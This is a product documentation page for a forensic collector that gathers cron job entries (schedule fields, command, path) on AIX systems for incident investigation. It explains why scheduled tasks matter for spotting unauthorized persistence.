Cron Jobs
Overview
Evidence: Cron Jobs Description: Collect cron jobs Category: System Platform: linux Short Name: cronj Is Parsed: Yes Sent to Investigation Hub: Yes Collect File(s): No
Background
Cron jobs on AIX systems are scheduled tasks that run automatically at specified times or intervals. This data is essential for understanding system automation, detecting unauthorized scheduled tasks, and investigating time-based security incidents. Cron jobs provide evidence of automated processes, maintenance tasks, and potential persistence mechanisms used by attackers.
Data Collected
This collector gathers structured data about cron jobs.
Cron Jobs Data
Minute
Minute
Example value
Hour
Hour
Example value
DayOfMonth
Day Of Month
Example value
Month
Month
Example value
DayOfWeek
Day Of Week
Example value
Command
Command
Example value
Path
Path
Example value
Event
Event
Example value
Collection Method
This collector parses the necessary data from cron configuration files.
Forensic Value
This evidence is crucial for forensic investigations as it provides information about scheduled tasks and automated processes on AIX systems. It helps investigators understand system automation, detect unauthorized scheduled tasks, and investigate time-based attacks. The data can reveal maintenance schedules, automated processes, and potential persistence mechanisms. Analysts can use this information to identify suspicious scheduled tasks, trace automated activities, and assess AIX system security posture.
Last updated
Was this helpful?